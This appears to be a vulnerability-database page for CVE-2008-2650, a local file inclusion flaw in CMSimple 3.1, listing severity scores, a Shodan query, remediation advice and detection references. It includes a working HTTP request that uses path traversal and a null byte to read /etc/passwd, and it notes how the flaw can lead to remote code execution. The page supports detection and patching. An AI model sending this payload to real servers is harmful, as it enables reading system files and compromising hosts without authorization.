🔙 목록으로 돌아가기

CVE-2008-2650: CMSimple 3.1 - Local File Inclusion

TitleCMSimple 3.1 - Local File Inclusion
Authorpussycat0x
SeverityMedium
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
RemediationUpgrade CMSimple to a patched version or apply the necessary security patches provided by the vendor.
CVSS Score6.8
EPSS Score0.01643
CVE IDCVE-2008-2650
CWE IDCWE-22
Shodan Querycpe:"cpe:2.3:a:cmsimple:cmsimple"
Tags cve cve2008 lfi cmsimple vuln

🔍 Vulnerability Description

CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.

🌐 HTTP Request

GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2008/CVE-2008-2650.yaml

🦈 Packet Capture: ⬇️ Download cve-2008-2650.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A